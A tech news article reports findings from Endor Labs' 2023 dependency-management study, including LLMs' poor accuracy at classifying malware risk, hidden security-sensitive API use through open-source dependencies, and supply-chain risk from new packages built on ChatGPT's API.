UPDATED 06:00 EDT / JULY 19 2023

SECURITY

Endor Labs report warns AI and LLMs struggle to classify malware risk

A new report from dependency lifecycle management startup Endor Labs Inc. has warned that artificial intelligence and large language models are unable to classify malware risk in most cases accurately.

The “State of Dependency Management 2023” report, compiled by Endor’s Station 9 research team, explores emerging trends that software organizations need to consider as part of their security strategy and risks associated with using existing open-source software in application development. The rise of services such as OpenAI LP’s ChatGPT application programming interface comes in for particular attention, with the report finding that almost half of all applications make no calls to security-sensitive APIs in their code base.

Key findings in the report include that existing LLM technologies can’t be used to assist reliably in malware detection and scale. Instead, the researchers found that LLMs only accurately classify malware risk in barely 5% of all cases.

While it’s noted that AI and LLM models do have value in manual workflows, they will likely never be fully reliable in autonomous workflows as they can’t be trained to recognize novel approaches, such as those derived through LLM recommendations.

The report found that 45% of applications were found to have no calls to security-sensitive APIs in their code base, but the number drops to 5% when dependencies are included. The result indicate that organizations routinely underestimate risk when they don’t analyze their use of such APIs through open-source dependencies.

Java gets a look-in as well. The report finds that even though 71% of typical Java application code is from open-source components, applications use only 12% of imported code. Vulnerabilities in unused code are rarely exploitable, but organizations can eliminate or deprioritize 60% of remediation work with reliable insights into which code is reachable throughout an application.

ChatGPT’s API is already seeing use in 900 Node Package Manager and Python Package Index packages across various problem domains. Three-quarters of these were found to be completely new packages. The report noted that pairing rapid growth with a lack of historical data potentially opens the door for attacks.

“The fact that there’s been such a rapid expansion of new technologies related to artificial intelligence and that these capabilities are being integrated into so many other applications is truly remarkable — but it’s equally important to monitor the risks they bring with them,” Henrik Plate, lead security researcher at Endor Labs Station9, said ahead of the report’s release. “These advances can cause considerable harm if the packages selected introduce malware and other risks to the software supply chain.”

Image: Bing Image Creator

A message from John Furrier, co-founder of SiliconANGLE:

Your vote of support is important to us and it helps us keep the content FREE.

One click below supports our mission to provide free, deep, and relevant content.  

Join our community on YouTube

Join the community that includes more than 15,000 #CubeAlumni experts, including Amazon.com CEO Andy Jassy, Dell Technologies founder and CEO Michael Dell, Intel CEO Pat Gelsinger, and many more luminaries and experts.

“TheCUBE is an important partner to the industry. You guys really are a part of our events and we really appreciate you coming and I know people appreciate the content you create as well” – Andy Jassy

THANK YOU